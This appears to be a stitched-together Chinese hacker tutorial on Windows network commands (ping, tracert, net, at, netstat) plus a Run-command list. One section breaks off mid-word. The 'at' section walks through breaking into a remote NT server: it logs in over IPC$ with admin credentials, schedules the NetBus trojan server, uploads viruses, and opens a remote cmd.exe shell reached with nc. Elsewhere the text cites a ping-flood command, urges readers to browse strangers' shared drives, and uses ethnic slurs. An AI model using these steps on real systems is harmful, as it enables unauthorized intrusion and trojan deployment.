網路安全較有關係的幾個命令有:ping winipcfg tracert netat netstat
1. ping:這是TCP/IP協議中最有用的命令之一
它給另一個系統發送一系列的資料包,該系統本身又發回一個響應,這條公用程式對尋找遠程主機很有用,它返回的結果表示是否能到達主機,宿主機發送一個返回資料包需要多長時間。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人為中止,否則一直ping下去)
-a Resolve addresses to hostnames.(把IP轉為主機名稱)
-n count Number of echo requests to send.(響應請求的數量)
-l size Send buffer size.(封包的大小)
-f Set Don"'t Fragment flag in packet.(資訊包中無片段)
-i TTL Time To Live.(時間)
-v TOS Type Of Service.(服務類型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(較嚴格的……唉,怎麼譯好……算了,放著吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的時間)
比如大家可能都知道的一個命令 # ping -f -s 65000 ***.***.***.***或者前階段大家所謂ping死黴國佬時所用的命令(當然這樣只會造成我方自己的網路阻塞)。
其實這個命令主要是用來看對方應答的速度,如果怎麼ping 得到的結果都是request time out。那恐怕你根本就不用你去找這台主機了,它不在你的射程之內。
2. winipcfg:
這是用來看自己IP位址的小工具,win98內建,NT裡則網路監視器裡就能看到IP了,還有個小公用程式叫……好象是叫IPCONFIG吧,沒怎麼用,都快忘了……這種東東網上其實相當之多,但既然“內建”,又何須外求,何況網上下載的駭客的東東裡有沒有特洛伊猶未可知,再說了,如果你不是在自己的“愛姬”上運行,豈不是就沒法幹活?——哈,不好意思,跑題了,但——接著跑兩句:可以把一些常用的、經典的工具上傳到網上,當作一個備份,什麼時候在網吧、某家公司要幹活的話,直接下載就是一個完整無缺的工具包了。
這個東東相當簡單,直接在DOS下鍵入命令就是了,沒有什麼參數。
3. tracert:是驗證通往遠程主機路徑的公用程式
用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
參數:
-d Do not resolve addresses to hostnames.(不將IP轉為主機名稱)
-h maximum_hops Maximum number of hops to search for target.(最大跟蹤數量)
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.(time out 的時間)
最簡單的用法就是 tracert hostname 其中hostname是電腦名稱或你想跟蹤其路徑的電腦的IP地址。TRACERT將返回資料包藉以到達最終目的地的各種IP地址,你知道該怎麼利用它嗎?
我略為解釋一下吧:跟蹤通往210.142.192.130的路由,最大30:
第一行:*&^%&* 我就是從這裡出去的(呵,真不想說^&^)
第四行:是不是快要出國了呢?
第九行:呀!這是日本鬼子的地盤……
4. net:這可是個非常棒的東西,如果不會用的話,趕緊睜大眼睛噢
這個命令的文法是: 可用的命令包括:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW
NET HELP SERVICES 列出使用者可以啟動的網路服務。
NET HELP SYNTAX 解釋如何閱讀 NET HELP 文法行。
NET HELP command MORE 用於逐屏顯示協助。
我可就不逐樣解釋了——這樣會把我的手指累壞,就說說常用的兩個命令吧
a.net view
這個命令的文法是:NET VIEW [computername /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [computername]
NET VIEW 用於顯示一個電腦上共用資源的列表。當不帶選項使用本命令時,
它就會顯示當前域或網路上的電腦上的列表。
computername 指使用者希望瀏覽其共用資源的電腦。
/DOMAIN:domainname 指定使用者希望瀏覽有效電腦所在的域。如果省略了網域名稱,
就會顯示區域網路絡上的所有域。
/NETWORK:NW 顯示 NetWare 網路上所有可用的伺服器。如果指定了一個計算
機名,就會顯示NetWare 網路中那個電腦上的可用資源。
至於舉例嘛,比如你知道一個遠端電腦***.***.**.***上有開資源共用,那麼運行
net view ***.***.**.*** 就可以了
b.net use
這個命令的文法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
[/USER:[domainname]username]
[[/Delete] [/PERSISTENT:{YES NO}]]
NET USE [devicename *] [password *]] [/HOME]
NET USE [/PERSISTENT:{YES NO}]
NET USE 用於將電腦與共用的資源相串連,或者切斷電腦與共用資源的
串連。當不帶選項使用本命令時,它會列出電腦的串連。
devicename 指定一個名字以便與資源相串連,或者指定要切斷的裝置。有兩種類型
的裝置名稱:磁碟機 (D: 至 Z:) 和印表機 (LPT1: 至 LPT3:)。輸入
一個星號來代替一個指定的裝置名稱可以分配下一個可用裝置名稱。
computername 指控制共用資源的電腦的名字。如果電腦名稱中包含有Null 字元,
就要將雙反斜線 () 和電腦名稱一起用引號 (" ")括起來。電腦名稱
可以有1 到15 個 字元。
sharename 指共用資源的網路名稱字。
volume 指定一個伺服器上的 NetWare 卷。使用者必須安裝 Netware 的客戶服務
(Windows NT 工作站) 或者 Netware 的網關服務 (Windows NT 服務
器) 並使之與NetWare 伺服器相連。
password 指訪問共用資源所需要的密碼。
* 進行密碼提示。當在密碼提示符下輸入密碼時,密碼是不會顯示的。
/USER 指定串連時的一個不同的使用者名稱。
domainname 指定另外一個域。如果預設域,就會使用當前登入的域。
username 指定登入的使用者名稱。
/HOME 將使用者與他們的宿主目錄相連。
/Delete 取消一個網路連接,並且從永久串連列表中刪除該串連。
/PERSISTENT 控制對永久網路連接的使用。其預設值是最近使用的設定。
YES 在串連產生時儲存它們,並在下次登入時恢複它們。
NO 不儲存正在產生的串連或後續的串連;現有的串連將在下次登入時被
恢複。可以使用 /Delete 選項開關來刪除永久串連。
PS:前兩天在綠色兵團的貼子裡見到一位仁兄的話,與這個命令有異曲共工之妙,也說明一個大概:
在瀏覽器中輸入 file:///***.***.**.***c¥
則網上共用的C盤內容就會顯示出來了,就彷彿用瀏覽器上FTP網站看到的一樣。各位不妨試試,還可試試舉一反三……
5.at: 排定在特定的日期和時間運行某些命令和程式。
運行 AT 命令之前必須先啟動 Schedule 服務。瞧,現炒就得現賣,剛學了net命令,但這個start命令我可沒詳述,自已看看協助檔案,摸索一下各種命令的用法吧。
C:》net start schedule
Schedule 正在啟動服務.....
Schedulw 服務啟動成功。
AT [computername] [ [id] [/Delete] /Delete [/YES]]
AT [computername] time [/INTERACTIVE]
[ /EVERY:date[,...] /NEXT:date[,...]] "command"
computername 指定遠端電腦。 如果省略這個參數
命令會被排定在本機上運行。
id 指定給排定進度命令的識別號。
/delete 刪除某個已排定進度的命令。如果省略標識,電腦上所有已排定進度的
命令都會被刪除。
/yes 用於刪除所有作業,且不想在運行刪除時顯示確認
資訊 。
time 指定命令啟動並執行時間。
/interactive 允許作業在運行時,與使用者通過案頭互動。
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令。
如果省略日期,則預設為在每月的本日運行。
/next:date[,...] 指定在下一個指定日期 (如,下周三),運行命令。
如果省略日期,則預設為在每月的本日運行。
"command" 準備啟動並執行 Windows NT 命令或批次檔。
知道了如何使用AT,再來看看如何在遠程NT上運行ntsrv.exe:
1 利用管理員登陸到目的伺服器,方法為: net use x.x.x.xipc¥ "adminpwd" /user:"adminuser"(這裡具體方法可參見KILLUSA的文章《HOW TO GET IN NT》)
2 利用ntsrv.exe啟動遠程: netsvc x.x.x.x schedule /start
3 利用AT.EXE在遠程伺服器設定程式定時運行,當然最快運行最理想,所以,你可以用letmein.exe得到伺服器的時間,然後:
at x.x.x.x 00:00 ntsrv.exe /port:64321
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會後,再在本地啟動netbus.exe,鍵入目的伺服器得ip地址或hostname,串連!比如第一種方法,你想要在目的伺服器運行諸如病毒之類的東東,可以利用netbus得上傳功能,將各種“大補丸”上傳至目的伺服器,再用netbus的"Start program",鍵入完整路徑,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動遠程telnet服務,如下:在netbus中擊“App redirect”,鍵入"C:》winntsystem32cmd.exe",Port為:4321,服務就啟動了,然後在本地運行:nc x.x.x.x 4321,出現dos啟動的畫面就表示串連成功:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:》
註:這裡有一小段是抄KILLUSA的文章——別找我要稿費啊^&^
6.netstat 這是一個觀察網路連接狀態的工具 + 生產力。
它能檢驗IP的當前串連狀態,在斷定你的基本級通訊進行中後,就要驗證系統上的服務。這個服務包括檢查正在收聽輸入的通訊量和/或驗證你正在建立一個與遠端站台的會話,它可以很輕鬆地做到這一點。網上也可以看到很多如X-netstat之類的工具,是WIN介面的,更加直觀而已,並沒有多什麼功能,這個命令的具體用法如下:
Displays protocol statistics and current TCP/IP network connections.(顯示協議與當前網路連接)
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.(顯示所有串連和監聽連接埠)
-e Displays Ethernet statistics. This may be combined with the -s
option.(顯示以太串連,可以與-s連用)
-n Displays addresses and port numbers in numeri
Ⅰ Ping
C:""> Ping 61.136.253.204 [向61.136.253.204發送資料包]
Pinging 61.136.253.204 With 32 bytes of data: [正在發送 32 位元組的包到 :61.136.253.204]
Request timed out. [丟包 原因:逾時]
Reply from 61.136.253.204: bytes=32 time=62ms TTL=120 [正確抵達|大小32位元組|消耗時間 62ms ]
Reply from 61.136.253.204: bytes=32 time=69ms TTL=120
Reply from 61.136.253.204: bytes=32 time=59ms TTL=120
Ping statistics for 61.136.253.204 [資料統計]
Packets: Sent = 4, Received = 3, Lost = 1 <25% loss>, [發送了4個資料包,收到了3個,丟失1個佔25% ]
Approximate round trip times in milli-seconds:
Minimum = 59ms, Maximum = 69ms, Average = 63ms [最快抵達 59ms 最慢 69 ms 平均時間 63ms]
現在我們來加入命令參數:
C:""> Ping -a 61.136.253.204 -l 1 -t [-a 代表同時擷取主機名稱 -l 1 指定 包大小為 1bytes -t 直到使用者手動終止]
Pinging XINGXING [61.136.253.204] With 1 bytes of data:
Reply from 61.136.253.204: bytes=1 time=49ms TTL=120 [因為只發送1位元組的包,所以時間縮短了]
Reply from 61.136.253.204: bytes=1 time=59ms TTL=120
Reply from 61.136.253.204: bytes=1 time=54ms TTL=120
Reply from 61.136.253.204: bytes=1 time=55ms TTL=120
Reply from 61.136.253.204: bytes=1 time=50ms TTL=120
Reply from 61.136.253.204: bytes=1 time=49ms TTL=120
Reply from 61.136.253.204: bytes=1 time=49ms TTL=120
Ping statistics for 61.136.253.204
Packets: Sent = 7, Received = 7, Lost = 0 <0% loss>, [發送了7個資料包,收到了7個,丟失0個佔0% ]
Approximate round trip times in milli-seconds:
Minimum = 49ms, Maximum = 59ms, Average = 52ms [最快抵達 59ms 最慢 69 ms 平均時間 63ms]
Control-C [按 Ctrl + C 強行終止]
^C
C:"">
——————————————————————————————————————————
——————————————————————————————————————————
——————————————————————————————————————————
Ⅱ Netstat [這是一個觀察網路連接狀態的工具 + 生產力]
C:""> Netstat -a [顯示協議與當前網路連接]
Active Connections [活動的串連]
[連接埠類型] [本地的] [外部串連] [狀態]
Proto Local Address Foreign Address State
TCP freefwq:telnet freefwq:0 LISTENING [連接埠類型 TCP 通訊埠 Telnet 監聽狀態]
TCP freefwq:epmap freefwq:0 LISTENING
TCP freefwq:microsoft-ds freefwq:0 LISTENING
TCP freefwq:1026 freefwq:0 LISTENING [連接埠類型 TCP 通訊埠 1027 **** ]
TCP freefwq:1027 freefwq:0 LISTENING
TCP freefwq:5277 freefwq:0 LISTENING
UDP freefwq:microsoft-ds *:*
UDP freefwq:3001 *:*
UDP freefwq:3005 *:* [連接埠類型 UDP 連接埠 3005]
UDP freefwq:4000 *:*
UDP freefwq:5419 *:*
.
.
.
C:""> Netstat -n -a [擴充命令參數]
Active Connections [活動的串連]
TCP 192.168.0.1:139 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3002 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3003 0.0.0.0:0 LISTENING
TCP 192.168.0.1:3004 0.0.0.0:0 LISTENING
TCP 211.91.155.117:139 0.0.0.0:0 LISTENING
TCP 211.91.155.117:8384 61.186.175.113:2887 ESTABLISHED [現在就可以很清楚的看見IP地址和連接埠名了]
UDP 0.0.0.0:135 *:*
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:3001 *:*
UDP 0.0.0.0:3005 *:*
UDP 0.0.0.0:4000 *:*
.
.
.
C:""> Netstat -e -a [擴充命令參數]
Interface Statistics [通訊資料統計]
Received [收到的] Sent [發送的]
Bytes [位元組] 91930821 97757485
Unicast packets [Unicast型] 413966 415520
Non-unicast packets 4004 1095
Discards 0 0
Errors [錯誤的] 0 0
Unknown protocols [未知協議] 1564
———————————————————————————————————————————
———————————————————————————————————————————
———————————————————————————————————————————
Ⅲ AT [排定在特定的日期和時間運行某些命令和程式]
C:""> AT
列表是空的。 [因為我們現在沒有給任何指定]
C:""> AT 22:30 Start C:""如果這都不算愛.mp3
新加了一項作業,其作業 ID = 1 [現在我們建立立了一個任務 在22:30分 系統將自動播放歌曲]
C:""> AT
狀態 ID 日期 時間 命令列 [我們輸入 AT 就可以看見先前的任務已經指定了]
-------------------------------------------------
1 今天 下午 22:00 Start C:""如果這都不算愛.mp3
C:""> AT 1 /Delete [刪除1號任務]
———————————————————————————————————————————
—— 打字打的頭昏眼花了,算了 NET 命令就簡單介紹幾個好了 ———
———————————————————————————————————————————
Ⅳ Net
1. Net user [查看使用者列表,或者添加使用者]
C:""> Net user
[下面將會顯示本機上的使用者]
C:""> Net user FengXiaoTian /add
[將在系統中添加一個新使用者 名字叫 FengXiaoTian
C:""> Net user administrator
[查看管理員的登陸情況 很有用的哦!萬一管理員現在線上 。。。。]
C:""> Net user FengXiaoTian /delete
[刪除使用者]
2. Net View [用於顯示一個電腦上共用資源的列表。當不帶選項使用本命令時,它就會顯示當前域或網路上的電腦上的列表。]
C:""> Net View [顯示網路電腦列表]
伺服器名稱 注釋
-----------------------------
""""FOX
""""GAOWEI
""""LHL
""""WANGWEI
""""ZWJ
C:""> Net View """"FOX [顯示FOX雞的共用內容]
共用名稱 類型 使用為 注釋
-------------------------------
G Disk
Music Disk
SharedDocs Disk
命令成功完成。 ——————————
--------------------------------------------------------------------------------
電腦網路命令ipconfig /all 查看所有IP地址及網卡地址
netstat /a 查看本機所有連接埠號碼
cmd Win2000進入DOS
regedt32 登錄編輯程式
ping 探測IP
mmc 進入控制台
dns 網域名稱轉換
chkdsk.exe dos磁碟檢查工具
SFC /SCANNOW 自動修複系統檔案
net stop 停止服務
net share ipc$ /del 停止分享
rundll32.exe user.exe,restartwindows 重新啟動電腦
rundll32.exe user.exe,exitwindows 關閉電腦
*.PWL 密碼檔案
[推薦]開始→運行→輸入的命令集錦
gpedit.msc-----組策略
sndrec32-------錄音機
Nslookup-------IP地址偵測器
explorer-------開啟資源管理員
logoff---------登出命令
tsshutdn-------60秒倒計時關機命令
lusrmgr.msc----本機使用者和組
services.msc---本地服務設定
oobe/msoobe /a----檢查XP是否啟用
notepad--------開啟記事本
cleanmgr-------垃圾整理
net start messenger----開始信差服務
compmgmt.msc---電腦管理
net stop messenger-----停止信差服務
conf-----------啟動 netmeeting
dvdplay--------DVD播放器
charmap--------啟動字元對應表
diskmgmt.msc---磁碟管理公用程式
calc-----------啟動計算機
dfrg.msc-------磁碟磁碟重組程式
chkdsk.exe-----Chkdsk磁碟檢查
devmgmt.msc--- 裝置管理員
regsvr32 /u *.dll----停止dll檔案運行
drwtsn32------ 系統醫生
rononce -p ----15秒關機
dxdiag---------檢查DirectX資訊
regedt32-------登錄編輯程式
Msconfig.exe---系統配置公用程式
rsop.msc-------組策略結果集
mem.exe--------顯示記憶體使用量情況
regedit.exe----註冊表
winchat--------XP內建區域網路聊天
progman--------程式管理器
winmsd---------系統資訊
perfmon.msc----電腦效能監測程式
winver---------檢查Windows版本
sfc /scannow-----掃描錯誤並複原
taskmgr-----工作管理員(2000/xp/2003)